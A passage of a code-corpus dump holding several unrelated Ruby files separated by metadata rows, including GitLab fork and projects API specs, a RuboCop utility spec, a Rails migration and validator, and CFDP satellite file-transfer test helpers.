end
end
| 30.114068 | 124 | 0.629798 |
bfab4387688d87f770ad69173f2c1a41e221e60b | 7,080 | # frozen_string_literal: true
require 'spec_helper'
describe 'Project fork' do
include ProjectForksHelper
let(:user) { create(:user) }
let(:project) { create(:project, :public, :repository) }
before do
sign_in user
end
it 'allows user to fork project' do
visit project_path(project)
expect(page).not_to have_css('a.disabled', text: 'Fork')
end
it 'disables fork button when user has exceeded project limit' do
user.projects_limit = 0
user.save!
visit project_path(project)
expect(page).to have_css('a.disabled', text: 'Fork')
end
context 'forking enabled / disabled in project settings' do
before do
project.project_feature.update_attribute(
:forking_access_level, forking_access_level)
end
context 'forking is enabled' do
let(:forking_access_level) { ProjectFeature::ENABLED }
it 'enables fork button' do
visit project_path(project)
expect(page).to have_css('a', text: 'Fork')
expect(page).not_to have_css('a.disabled', text: 'Fork')
end
it 'renders new project fork page' do
visit new_project_fork_path(project)
expect(page.status_code).to eq(200)
expect(page).to have_text(' Select a namespace to fork the project ')
end
end
context 'forking is disabled' do
let(:forking_access_level) { ProjectFeature::DISABLED }
it 'does not render fork button' do
visit project_path(project)
expect(page).not_to have_css('a', text: 'Fork')
end
it 'does not render new project fork page' do
visit new_project_fork_path(project)
expect(page.status_code).to eq(404)
end
end
context 'forking is private' do
let(:forking_access_level) { ProjectFeature::PRIVATE }
before do
project.update(visibility_level: Gitlab::VisibilityLevel::INTERNAL)
end
context 'user is not a team member' do
it 'does not render fork button' do
visit project_path(project)
expect(page).not_to have_css('a', text: 'Fork')
end
it 'does not render new project fork page' do
visit new_project_fork_path(project)
expect(page.status_code).to eq(404)
end
end
context 'user is a team member' do
before do
project.add_developer(user)
end
it 'enables fork button' do
visit project_path(project)
expect(page).to have_css('a', text: 'Fork')
expect(page).not_to have_css('a.disabled', text: 'Fork')
end
it 'renders new project fork page' do
visit new_project_fork_path(project)
expect(page.status_code).to eq(200)
expect(page).to have_text(' Select a namespace to fork the project ')
end
end
end
end
it 'forks the project', :sidekiq_might_not_need_inline do
visit project_path(project)
click_link 'Fork'
page.within '.fork-thumbnail-container' do
click_link user.name
end
expect(page).to have_content 'Forked from'
visit project_path(project)
expect(page).to have_content(/new merge request/i)
page.within '.nav-sidebar' do
first(:link, 'Merge Requests').click
end
expect(page).to have_content(/new merge request/i)
page.within '#content-body' do
click_link('New merge request')
end
expect(current_path).to have_content(/#{user.namespace.path}/i)
end
it 'shows avatars when Gravatar is disabled' do
stub_application_setting(gravatar_enabled: false)
visit project_path(project)
click_link 'Fork'
page.within('.fork-thumbnail-container') do
expect(page).to have_css('div.identicon')
end
end
it 'shows the forked project on the list' do
visit project_path(project)
click_link 'Fork'
page.within '.fork-thumbnail-container' do
click_link user.name
end
visit project_forks_path(project)
forked_project = user.fork_of(project.reload)
page.within('.js-projects-list-holder') do
expect(page).to have_content("#{forked_project.namespace.human_name} / #{forked_project.name}")
end
forked_project.update!(path: 'test-crappy-path')
visit project_forks_path(project)
page.within('.js-projects-list-holder') do
expect(page).to have_content("#{forked_project.namespace.human_name} / #{forked_project.name}")
end
end
context 'when the project is private' do
let(:project) { create(:project, :repository) }
let(:another_user) { create(:user, name: 'Mike') }
before do
project.add_reporter(user)
project.add_reporter(another_user)
end
it 'renders private forks of the project' do
visit project_path(project)
another_project_fork = Projects::ForkService.new(project, another_user).execute
click_link 'Fork'
page.within '.fork-thumbnail-container' do
click_link user.name
end
visit project_forks_path(project)
page.within('.js-projects-list-holder') do
user_project_fork = user.fork_of(project.reload)
expect(page).to have_content("#{user_project_fork.namespace.human_name} / #{user_project_fork.name}")
end
expect(page).not_to have_content("#{another_project_fork.namespace.human_name} / #{another_project_fork.name}")
end
end
context 'when the user already forked the project' do
before do
create(:project, :repository, name: project.name, namespace: user.namespace)
end
it 'renders error' do
visit project_path(project)
click_link 'Fork'
page.within '.fork-thumbnail-container' do
click_link user.name
end
expect(page).to have_content "Name has already been taken"
end
end
context 'maintainer in group' do
let(:group) { create(:group) }
before do
group.add_maintainer(user)
end
it 'allows user to fork project to group or to user namespace' do
visit project_path(project)
expect(page).not_to have_css('a.disabled', text: 'Fork')
click_link 'Fork'
expect(page).to have_css('.fork-thumbnail', count: 2)
expect(page).not_to have_css('.fork-thumbnail.disabled')
end
it 'allows user to fork project to group and not user when exceeded project limit' do
user.projects_limit = 0
user.save!
visit project_path(project)
expect(page).not_to have_css('a.disabled', text: 'Fork')
click_link 'Fork'
expect(page).to have_css('.fork-thumbnail', count: 2)
expect(page).to have_css('.fork-thumbnail.disabled')
end
it 'links to the fork if the project was already forked within that namespace', :sidekiq_might_not_need_inline do
forked_project = fork_project(project, user, namespace: group, repository: true)
visit new_project_fork_path(project)
expect(page).to have_css('div.forked', text: group.full_name)
click_link group.full_name
expect(current_path).to eq(project_path(forked_project))
end
end
end
| 25.934066 | 117 | 0.668785 |
d5d3e3cdadc6ae02358dcf3b706b0ea53232954a | 164 | class AddAncestryToLocation < ActiveRecord::Migration[5.0]
def change
add_column :locations, :ancestry, :string
add_index :locations, :ancestry
end
end
| 23.428571 | 58 | 0.75 |
1c73d674ea58a44adf7ab0dff99468cd098c1aac | 1,007 | class MyValidator < ActiveModel::Validator
def validate(record)
# Add an error if the name chosen is not unique to the user
if user_already_has_item_with_name?(record) && user_item_is_not_current_item(record)
record.errors[:base] << "You already have a #{record.class.name.downcase} named '#{record.name}'"
end
end
# Return true if the user already has an item with that name
def user_already_has_item_with_name?(record)
user_item_names(record).include?(record.name.downcase)
end
# Return array of item names
def user_item_names(record)
record.user.send(item_plural(record)).all.collect { |item| item.name }
end
# returns true if the item the user is editing is not the one being validated
def user_item_is_not_current_item(record)
User.find_by_slug(:username, record.user.slug(:username)).send(item_plural(record)).find_by_slug(:name, record.slug(:name)).id != record.id
end
def item_plural(record)
record.class.name.downcase + 's'
end
end
| 35.964286 | 143 | 0.738828 |
01ef61eb9959bb01006ce0c2b3cb8dd9fa9d1059 | 3,552 | # frozen_string_literal: true
describe RuboCop::Cop::Util do
class TestUtil
include RuboCop::Cop::Util
end
describe '#line_range' do
let(:source) do
<<-END
foo = 1
bar = 2
class Test
def some_method
do_something
end
end
baz = 8
END
end
let(:processed_source) { parse_source(source) }
let(:ast) { processed_source.ast }
let(:node) { ast.each_node.find(&:class_type?) }
context 'when Source::Range object is passed' do
it 'returns line range of that' do
line_range = described_class.line_range(node.loc.expression)
expect(line_range).to eq(3..7)
end
end
context 'when AST::Node object is passed' do
it 'returns line range of the expression' do
line_range = described_class.line_range(node)
expect(line_range).to eq(3..7)
end
end
end
describe 'source indicated by #range_with_surrounding_comma' do
let(:source) { 'raise " ,Error, "' }
let(:processed_source) { parse_source(source) }
let(:input_range) do
Parser::Source::Range.new(processed_source.buffer, 9, 14)
end
subject do
obj = TestUtil.new
obj.instance_exec(processed_source) { |src| @processed_source = src }
r = obj.send(:range_with_surrounding_comma, input_range, side)
processed_source.buffer.source[r.begin_pos...r.end_pos]
end
context 'when side is :both' do
let(:side) { :both }
it { is_expected.to eq(',Error,') }
end
context 'when side is :left' do
let(:side) { :left }
it { is_expected.to eq(',Error') }
end
context 'when side is :right' do
let(:side) { :right }
it { is_expected.to eq('Error,') }
end
end
describe 'source indicated by #range_with_surrounding_space' do
let(:source) { 'f { a(2) }' }
let(:processed_source) { parse_source(source) }
let(:input_range) do
Parser::Source::Range.new(processed_source.buffer, 5, 9)
end
subject do
obj = TestUtil.new
obj.instance_exec(processed_source) { |src| @processed_source = src }
r = obj.send(:range_with_surrounding_space, input_range, side)
processed_source.buffer.source[r.begin_pos...r.end_pos]
end
context 'when side is :both' do
let(:side) { :both }
it { is_expected.to eq(' a(2) ') }
end
context 'when side is :left' do
let(:side) { :left }
it { is_expected.to eq(' a(2)') }
end
context 'when side is :right' do
let(:side) { :right }
it { is_expected.to eq('a(2) ') }
end
end
describe '#to_symbol_literal' do
[
['foo', ':foo'],
['foo?', ':foo?'],
['foo!', ':foo!'],
['@foo', ':@foo'],
['@@foo', ':@@foo'],
['$\\', ':$\\'],
['$a', ':$a'],
['==', ':=='],
['a-b', ":'a-b'"]
].each do |string, expectation|
context "when #{string}" do
it "returns #{expectation}" do
expect(described_class.to_symbol_literal(string)).to eq(expectation)
end
end
end
end
describe '#to_supported_styles' do
subject { described_class.to_supported_styles(enforced_style) }
context 'when EnforcedStyle' do
let(:enforced_style) { 'EnforcedStyle' }
it { is_expected.to eq('SupportedStyles') }
end
context 'when EnforcedStyleInsidePipes' do
let(:enforced_style) { 'EnforcedStyleInsidePipes' }
it { is_expected.to eq('SupportedStylesInsidePipes') }
end
end
end
| 26.117647 | 78 | 0.594313 |
38a0ef6ecd793c8826e91e09ad74a4204099d7af | 6,462 | # FUNCTIONS
CFDP_CLASS_HASH = {"CFDP::PDUMetadata"=>0, "CFDP::PDUFileData"=>1, "CFDP::PDUFinished"=>2,
"CFDP::PDUNAK"=>3, "CFDP::PDUEOF"=>4, "CFDP::PDUACK"=>5}
def miss_pdus(*args)
miss_sent_hash = args[0][:miss_sent_pdus]
unless miss_sent_hash.nil?
miss_sent_hash.each do |key, value|
cmd("CFDP_TEST MISS_SENT_PACKET with PDU_CLASS #{CFDP_CLASS_HASH[key.to_s]}, PACKET_NUMBER_ARRAY #{value}")
end
end
miss_received_hash = args[0][:miss_received_pdus]
unless miss_received_hash.nil?
miss_received_hash.each do |key, value|
cmd("CFDP_TEST MISS_RECEIVED_PACKET with PDU_CLASS #{CFDP_CLASS_HASH[key.to_s]}, PACKET_NUMBER_ARRAY #{value}")
end
end
wait(1)
end
# This function specify how long a file transaction should performn
def calculateWaitTime(fileSize, link)
# fileSize should be in bytes, so...
# Hypotetical 50% of max performance here.
perf = 0.5
return (fileSize/((link*perf).to_i<<7).to_f).ceil*2
end
# This monkey patch is used to check if a string contains
# multiples substrings (in any order)
class String
def minclude?(arg)
raise ArgumentError unless arg.is_a?(Array)
arg.each do |arg1|
return false unless self.include?(arg1)
end
return true
end
end
# This is a specific function that verifies if TO is available.
# If not, it enables it.
def TO_enabled?(ip, destport, routemask, ifiledesc, default_timeout)
counter = get_tlm_cnt("TO", "TO_HKPACKET")
begin
puts "Verifying if TO is enable"
wait_check_expression("get_tlm_cnt(\"TO\", \"TO_HKPACKET\") > #{counter}", default_timeout)
rescue
puts "TO not enable. Enabling it now!"
cmd("TO TO_ENABLE_OUTPUT with IP \"#{ip}\", DESTPORT #{destport}, ROUTEMASK #{routemask}, IFILEDESC #{ifiledesc}")
wait_check_expression("get_tlm_cnt(\"TO\", \"TO_HKPACKET\") > #{counter}", default_timeout)
end
end
# This is a specific function that verifies if TO is available.
# This is to be called within a test event, so it can contains
# scripting commands for COSMOS.
def TO_available?(default_timeout=5)
puts "Verifying if TO is enable"
# This function needs that TO_HKPACKET tlm are sent by default
counter = get_tlm_cnt("TO", "TO_HKPACKET")
cmd("TO TO_ENABLE_OUTPUT with IP \"#{MY_IP}\", DESTPORT 1235, ROUTEMASK 0, IFILEDESC 0")
wait_check_expression("get_tlm_cnt('TO', 'TO_HKPACKET') > #{counter}", default_timeout)
puts "TO is ok."
end
# This is a specific function that verifies if CF is available.
# This is to be called within a test event, so it can contains
# scripting commands for COSMOS.
def CF_available?(default_timeout)
puts "Verifying if CF is enable"
# To must be available in order to check CF
TO_available?(default_timeout)
# This functions needs that CF_HKPACKET tlm are sent by default
counter = get_tlm_cnt("CF", "CF_HKPACKET")
wait_check_expression("get_tlm_cnt('CF', 'CF_HKPACKET') > #{counter}", default_timeout)
puts "CF is ok."
end
# This function return the minimal amount of PDUS that will be transfered for a given
# file. fileSize must be in kilobytes.
def PDUS?(pdu_size, fileSize)
return ((fileSize<<10)/pdu_size).ceil
end
def appendFile(fileName, text)
return if (text.nil? || fileName.nil?)
File.open(fileName, 'a+') do |file|
file.write(text)
end
end
def downlinkAndCheck(check, classe, channel, priority, preserve, peerID, sourceFileName, destFileName, waitTime)
downlinkTransfer(classe, channel, priority, preserve, peerID, sourceFileName, destFileName, waitTime)
wait(1) # this wait is to check if file is gonna be written
check_expression("#{File.exist?(destFileName)} == #{check}")
wait(1)
end
# This function starts a file downlink transfer on satelite and
# validate it using CF and TO HK tlm packets
def downlinkTransfer(classe, channel, priority, preserve, peerID, sourceFileName, destFileName, waitTime)
# Initialize counters
counter = get_tlm_cnt("CF", "CF_HKPACKET")
filesSent = tlm("CF CF_HKPACKET ENG_TOTALFILESSENT")
# Ask for a file
cmd("CF CF_PLAYBACK_FILE_CC with CLASS #{classe},
CHANNEL #{channel},
PRIORITY #{priority},
PRESERVE #{preserve},
PEERID \"#{peerID}\",
SRCFILENAME \"#{sourceFileName}\",
DSTFILENAME \"#{destFileName}\""
)
# Wait for successful file transaction
wait_check_expression("get_tlm_cnt('CF', 'CF_HKPACKET') > #{counter} and tlm('CF CF_HKPACKET ENG_TOTALFILESSENT') > #{filesSent}", waitTime)
end
def uplinkTransfer(classe, destID, sourceFileName, destFileName, waitTime, shouldSucess = true)
# Initialize counters
counter = get_tlm_cnt("CF", "CF_HKPACKET")
filesReceived = tlm("CF CF_HKPACKET APP_TOTALSUCCESSTRANS")
totalFailedTrans = tlm("CF CF_HKPACKET APP_TOTALFAILEDTRANS")
# Send file
cmd("CFDP SEND_FILE with CLASS #{classe},
DEST_ID '#{destID}',
SRCFILENAME '#{sourceFileName}',
DSTFILENAME '#{destFileName}'
")
# Wait for successful file transaction
if shouldSucess
wait_check_expression("get_tlm_cnt('CF', 'CF_HKPACKET') > #{counter} and tlm('CF CF_HKPACKET APP_TOTALSUCCESSTRANS') > #{filesReceived}", waitTime)
else
wait_check_expression("get_tlm_cnt('CF', 'CF_HKPACKET') > #{counter} and tlm('CF CF_HKPACKET APP_TOTALFAILEDTRANS') > #{totalFailedTrans}", waitTime)
end
end
def createMainTestDir(current_test_suite, current_test, current_test_case)
time = Time.now
mainTestDir = Cosmos::USERPATH+"/outputs/tests/"
Dir.mkdir(mainTestDir+current_test_suite.to_s) unless Dir.exist?(mainTestDir+current_test_suite.to_s)
Dir.mkdir(mainTestDir+"#{current_test_suite}/#{current_test}") unless Dir.exist?(mainTestDir+"#{current_test_suite}/#{current_test}")
Dir.mkdir(mainTestDir+"#{current_test_suite}/#{current_test}/" + current_test_case.to_s) unless Dir.exist?(mainTestDir+"#{current_test_suite}/#{current_test}/" + current_test_case.to_s)
finalTestDir = mainTestDir+"#{current_test_suite}/#{current_test}/" + current_test_case.to_s
finalTestDir += "/" + time.strftime("%Y%m%d_%H%M%S")
Dir.mkdir(finalTestDir)
Dir.mkdir(finalTestDir+"/input")
Dir.mkdir(finalTestDir+"/output")
return finalTestDir
end
def createRandomFile(fileName, size)
File.open(fileName, 'wb+') do |f|
size.to_i.times {
f.write(SecureRandom.random_bytes((1<<10)))
}
end
end
def printFullHash(hash)
return "nil" if (hash.nil? || hash.empty?)
hashoutput = ""
hash.each { |key, value| hashoutput << "#{key}=>#{value.to_s}, " }
return "{#{hashoutput.chop!.chop!}}"
end | 32.969388 | 186 | 0.728412 |
f77ab3bd77e08b35057d71ddc0d52b2171a59e66 | 738 | class Task::Filter::ContactInfoAddr < Task::Filter::Base
def execute_query(tasks, filters)
# We are plucking ids here because the contact filter already generates an sql statement with several nested subqueries
# and sending too many of those to postgres can cause unexpected errors and is often slower than breaking things up.
# Do not change this unless you test the results before pushing to production.
tasks.joins(:contacts)
.where(contacts: { id: Contact::Filter::ContactInfoAddr.query(contact_scope(tasks), filters, account_lists).ids })
end
delegate :custom_options,
:parent,
:type,
:title,
to: 'Contact::Filter::ContactInfoAddr.new(account_lists)'
end
| 43.411765 | 123 | 0.711382 |
911e01af2eb2306bda9afdfeea843a51c60653ff | 67,135 | # -*- coding: utf-8 -*-
require 'spec_helper'
describe API::Projects do
include Gitlab::CurrentSettings
let(:user) { create(:user) }
let(:user2) { create(:user) }
let(:user3) { create(:user) }
let(:admin) { create(:admin) }
let(:project) { create(:project, namespace: user.namespace) }
let(:project2) { create(:project, path: 'project2', namespace: user.namespace) }
let(:snippet) { create(:project_snippet, :public, author: user, project: project, title: 'example') }
let(:project_member) { create(:project_member, :developer, user: user3, project: project) }
let(:user4) { create(:user) }
let(:project3) do
create(:project,
:private,
:repository,
name: 'second_project',
path: 'second_project',
creator_id: user.id,
namespace: user.namespace,
merge_requests_enabled: false,
issues_enabled: false, wiki_enabled: false,
builds_enabled: false,
snippets_enabled: false)
end
let(:project_member2) do
create(:project_member,
user: user4,
project: project3,
access_level: ProjectMember::MASTER)
end
let(:project4) do
create(:project,
name: 'third_project',
path: 'third_project',
creator_id: user4.id,
namespace: user4.namespace)
end
describe 'GET /projects' do
shared_examples_for 'projects response' do
it 'returns an array of projects' do
get api('/projects', current_user), filter
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.map { |p| p['id'] }).to contain_exactly(*projects.map(&:id))
end
end
shared_examples_for 'projects response without N + 1 queries' do
it 'avoids N + 1 queries' do
control_count = ActiveRecord::QueryRecorder.new do
get api('/projects', current_user)
end.count
if defined?(additional_project)
additional_project
else
create(:project, :public)
end
expect do
get api('/projects', current_user)
end.not_to exceed_query_limit(control_count + 8)
end
end
let!(:public_project) { create(:project, :public, name: 'public_project') }
before do
project
project2
project3
project4
end
context 'when unauthenticated' do
it_behaves_like 'projects response' do
let(:filter) { { search: project.name } }
let(:current_user) { user }
let(:projects) { [project] }
end
it_behaves_like 'projects response without N + 1 queries' do
let(:current_user) { nil }
end
end
context 'when authenticated as regular user' do
it_behaves_like 'projects response' do
let(:filter) { {} }
let(:current_user) { user }
let(:projects) { [public_project, project, project2, project3] }
end
it_behaves_like 'projects response without N + 1 queries' do
let(:current_user) { user }
end
context 'when some projects are in a group' do
before do
create(:project, :public, group: create(:group))
end
it_behaves_like 'projects response without N + 1 queries' do
let(:current_user) { user }
let(:additional_project) { create(:project, :public, group: create(:group)) }
end
end
it 'includes the project labels as the tag_list' do
get api('/projects', user)
expect(response.status).to eq 200
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.first.keys).to include('tag_list')
end
it 'includes open_issues_count' do
get api('/projects', user)
expect(response.status).to eq 200
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.first.keys).to include('open_issues_count')
end
it 'does not include open_issues_count if issues are disabled' do
project.project_feature.update_attribute(:issues_access_level, ProjectFeature::DISABLED)
get api('/projects', user)
expect(response.status).to eq 200
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.find { |hash| hash['id'] == project.id }.keys).not_to include('open_issues_count')
end
it "does not include statistics by default" do
get api('/projects', user)
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.first).not_to include('statistics')
end
it "includes statistics if requested" do
get api('/projects', user), statistics: true
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.first).to include 'statistics'
end
context 'when external issue tracker is enabled' do
let!(:jira_service) { create(:jira_service, project: project) }
it 'includes open_issues_count' do
get api('/projects', user)
expect(response.status).to eq 200
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.first.keys).to include('open_issues_count')
expect(json_response.find { |hash| hash['id'] == project.id }.keys).to include('open_issues_count')
end
it 'does not include open_issues_count if issues are disabled' do
project.project_feature.update_attribute(:issues_access_level, ProjectFeature::DISABLED)
get api('/projects', user)
expect(response.status).to eq 200
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.find { |hash| hash['id'] == project.id }.keys).not_to include('open_issues_count')
end
end
context 'and with simple=true' do
it 'returns a simplified version of all the projects' do
expected_keys = %w(
id description default_branch tag_list
ssh_url_to_repo http_url_to_repo web_url
name name_with_namespace
path path_with_namespace
star_count forks_count
created_at last_activity_at
)
get api('/projects?simple=true', user)
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.first.keys).to match_array expected_keys
end
end
context 'and using search' do
it_behaves_like 'projects response' do
let(:filter) { { search: project.name } }
let(:current_user) { user }
let(:projects) { [project] }
end
end
context 'and membership=true' do
it_behaves_like 'projects response' do
let(:filter) { { membership: true } }
let(:current_user) { user }
let(:projects) { [project, project2, project3] }
end
end
context 'and using the visibility filter' do
it 'filters based on private visibility param' do
get api('/projects', user), { visibility: 'private' }
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.map { |p| p['id'] }).to contain_exactly(project.id, project2.id, project3.id)
end
it 'filters based on internal visibility param' do
project2.update_attribute(:visibility_level, Gitlab::VisibilityLevel::INTERNAL)
get api('/projects', user), { visibility: 'internal' }
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.map { |p| p['id'] }).to contain_exactly(project2.id)
end
it 'filters based on public visibility param' do
get api('/projects', user), { visibility: 'public' }
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.map { |p| p['id'] }).to contain_exactly(public_project.id)
end
end
context 'and using sorting' do
it 'returns the correct order when sorted by id' do
get api('/projects', user), { order_by: 'id', sort: 'desc' }
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.first['id']).to eq(project3.id)
end
end
context 'and with owned=true' do
it 'returns an array of projects the user owns' do
get api('/projects', user4), owned: true
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.first['name']).to eq(project4.name)
expect(json_response.first['owner']['username']).to eq(user4.username)
end
end
context 'and with starred=true' do
let(:public_project) { create(:project, :public) }
before do
project_member
user3.update_attributes(starred_projects: [project, project2, project3, public_project])
end
it 'returns the starred projects viewable by the user' do
get api('/projects', user3), starred: true
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.map { |project| project['id'] }).to contain_exactly(project.id, public_project.id)
end
end
context 'and with all query parameters' do
let!(:project5) { create(:project, :public, path: 'gitlab5', namespace: create(:namespace)) }
let!(:project6) { create(:project, :public, path: 'project6', namespace: user.namespace) }
let!(:project7) { create(:project, :public, path: 'gitlab7', namespace: user.namespace) }
let!(:project8) { create(:project, path: 'gitlab8', namespace: user.namespace) }
let!(:project9) { create(:project, :public, path: 'gitlab9') }
before do
user.update_attributes(starred_projects: [project5, project7, project8, project9])
end
context 'including owned filter' do
it 'returns only projects that satisfy all query parameters' do
get api('/projects', user), { visibility: 'public', owned: true, starred: true, search: 'gitlab' }
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.size).to eq(1)
expect(json_response.first['id']).to eq(project7.id)
end
end
context 'including membership filter' do
before do
create(:project_member,
user: user,
project: project5,
access_level: ProjectMember::MASTER)
end
it 'returns only projects that satisfy all query parameters' do
get api('/projects', user), { visibility: 'public', membership: true, starred: true, search: 'gitlab' }
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.size).to eq(2)
expect(json_response.map { |project| project['id'] }).to contain_exactly(project5.id, project7.id)
end
end
end
end
context 'when authenticated as a different user' do
it_behaves_like 'projects response' do
let(:filter) { {} }
let(:current_user) { user2 }
let(:projects) { [public_project] }
end
end
context 'when authenticated as admin' do
it_behaves_like 'projects response' do
let(:filter) { {} }
let(:current_user) { admin }
let(:projects) { Project.all }
end
end
end
describe 'POST /projects' do
context 'maximum number of projects reached' do
it 'does not create new project and respond with 403' do
allow_any_instance_of(User).to receive(:projects_limit_left).and_return(0)
expect { post api('/projects', user2), name: 'foo' }
.to change {Project.count}.by(0)
expect(response).to have_http_status(403)
end
end
it 'creates new project without path but with name and returns 201' do
expect { post api('/projects', user), name: 'Foo Project' }
.to change { Project.count }.by(1)
expect(response).to have_http_status(201)
project = Project.first
expect(project.name).to eq('Foo Project')
expect(project.path).to eq('foo-project')
end
it 'creates new project without name but with path and returns 201' do
expect { post api('/projects', user), path: 'foo_project' }
.to change { Project.count }.by(1)
expect(response).to have_http_status(201)
project = Project.first
expect(project.name).to eq('foo_project')
expect(project.path).to eq('foo_project')
end
it 'creates new project with name and path and returns 201' do
expect { post api('/projects', user), path: 'path-project-Foo', name: 'Foo Project' }
.to change { Project.count }.by(1)
expect(response).to have_http_status(201)
project = Project.first
expect(project.name).to eq('Foo Project')
expect(project.path).to eq('path-project-Foo')
end
it 'creates last project before reaching project limit' do
allow_any_instance_of(User).to receive(:projects_limit_left).and_return(1)
post api('/projects', user2), name: 'foo'
expect(response).to have_http_status(201)
end
it 'does not create new project without name or path and returns 400' do
expect { post api('/projects', user) }.not_to change { Project.count }
expect(response).to have_http_status(400)
end
it "assigns attributes to project" do
project = attributes_for(:project, {
path: 'camelCasePath',
issues_enabled: false,
jobs_enabled: false,
merge_requests_enabled: false,
wiki_enabled: false,
resolve_outdated_diff_discussions: false,
only_allow_merge_if_pipeline_succeeds: false,
request_access_enabled: true,
only_allow_merge_if_all_discussions_are_resolved: false,
ci_config_path: 'a/custom/path'
})
post api('/projects', user), project
expect(response).to have_http_status(201)
project.each_pair do |k, v|
next if %i[has_external_issue_tracker issues_enabled merge_requests_enabled wiki_enabled].include?(k)
expect(json_response[k.to_s]).to eq(v)
end
# Check feature permissions attributes
project = Project.find_by_path(project[:path])
expect(project.project_feature.issues_access_level).to eq(ProjectFeature::DISABLED)
expect(project.project_feature.merge_requests_access_level).to eq(ProjectFeature::DISABLED)
expect(project.project_feature.wiki_access_level).to eq(ProjectFeature::DISABLED)
end
it 'sets a project as public' do
project = attributes_for(:project, visibility: 'public')
post api('/projects', user), project
expect(json_response['visibility']).to eq('public')
end
it 'sets a project as internal' do
project = attributes_for(:project, visibility: 'internal')
post api('/projects', user), project
expect(json_response['visibility']).to eq('internal')
end
it 'sets a project as private' do
project = attributes_for(:project, visibility: 'private')
post api('/projects', user), project
expect(json_response['visibility']).to eq('private')
end
it 'sets tag list to a project' do
project = attributes_for(:project, tag_list: %w[tagFirst tagSecond])
post api('/projects', user), project
expect(json_response['tag_list']).to eq(%w[tagFirst tagSecond])
end
it 'uploads avatar for project a project' do
project = attributes_for(:project, avatar: fixture_file_upload(Rails.root + 'spec/fixtures/banana_sample.gif', 'image/gif'))
post api('/projects', user), project
project_id = json_response['id']
expect(json_response['avatar_url']).to eq("http://localhost/uploads/-/system/project/avatar/#{project_id}/banana_sample.gif")
end
it 'sets a project as allowing outdated diff discussions to automatically resolve' do
project = attributes_for(:project, resolve_outdated_diff_discussions: false)
post api('/projects', user), project
expect(json_response['resolve_outdated_diff_discussions']).to be_falsey
end
it 'sets a project as allowing outdated diff discussions to automatically resolve if resolve_outdated_diff_discussions' do
project = attributes_for(:project, resolve_outdated_diff_discussions: true)
post api('/projects', user), project
expect(json_response['resolve_outdated_diff_discussions']).to be_truthy
end
it 'sets a project as allowing merge even if build fails' do
project = attributes_for(:project, only_allow_merge_if_pipeline_succeeds: false)
post api('/projects', user), project
expect(json_response['only_allow_merge_if_pipeline_succeeds']).to be_falsey
end
it 'sets a project as allowing merge only if merge_when_pipeline_succeeds' do
project = attributes_for(:project, only_allow_merge_if_pipeline_succeeds: true)
post api('/projects', user), project
expect(json_response['only_allow_merge_if_pipeline_succeeds']).to be_truthy
end
it 'sets a project as allowing merge even if discussions are unresolved' do
project = attributes_for(:project, only_allow_merge_if_all_discussions_are_resolved: false)
post api('/projects', user), project
expect(json_response['only_allow_merge_if_all_discussions_are_resolved']).to be_falsey
end
it 'sets a project as allowing merge if only_allow_merge_if_all_discussions_are_resolved is nil' do
project = attributes_for(:project, only_allow_merge_if_all_discussions_are_resolved: nil)
post api('/projects', user), project
expect(json_response['only_allow_merge_if_all_discussions_are_resolved']).to be_falsey
end
it 'sets a project as allowing merge only if all discussions are resolved' do
project = attributes_for(:project, only_allow_merge_if_all_discussions_are_resolved: true)
post api('/projects', user), project
expect(json_response['only_allow_merge_if_all_discussions_are_resolved']).to be_truthy
end
it 'ignores import_url when it is nil' do
project = attributes_for(:project, import_url: nil)
post api('/projects', user), project
expect(response).to have_http_status(201)
end
context 'when a visibility level is restricted' do
let(:project_param) { attributes_for(:project, visibility: 'public') }
before do
stub_application_setting(restricted_visibility_levels: [Gitlab::VisibilityLevel::PUBLIC])
end
it 'does not allow a non-admin to use a restricted visibility level' do
post api('/projects', user), project_param
expect(response).to have_http_status(400)
expect(json_response['message']['visibility_level'].first).to(
match('restricted by your GitLab administrator')
)
end
it 'allows an admin to override restricted visibility settings' do
post api('/projects', admin), project_param
expect(json_response['visibility']).to eq('public')
end
end
end
describe 'GET /users/:user_id/projects/' do
let!(:public_project) { create(:project, :public, name: 'public_project', creator_id: user4.id, namespace: user4.namespace) }
it 'returns error when user not found' do
get api('/users/9999/projects/')
expect(response).to have_http_status(404)
expect(json_response['message']).to eq('404 User Not Found')
end
it 'returns projects filtered by user' do
get api("/users/#{user4.id}/projects/", user)
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.map { |project| project['id'] }).to contain_exactly(public_project.id)
end
end
describe 'POST /projects/user/:id' do
before do
expect(project).to be_persisted
end
it 'creates new project without path but with name and return 201' do
expect { post api("/projects/user/#{user.id}", admin), name: 'Foo Project' }.to change {Project.count}.by(1)
expect(response).to have_http_status(201)
project = Project.last
expect(project.name).to eq('Foo Project')
expect(project.path).to eq('foo-project')
end
it 'creates new project with name and path and returns 201' do
expect { post api("/projects/user/#{user.id}", admin), path: 'path-project-Foo', name: 'Foo Project' }
.to change { Project.count }.by(1)
expect(response).to have_http_status(201)
project = Project.last
expect(project.name).to eq('Foo Project')
expect(project.path).to eq('path-project-Foo')
end
it 'responds with 400 on failure and not project' do
expect { post api("/projects/user/#{user.id}", admin) }
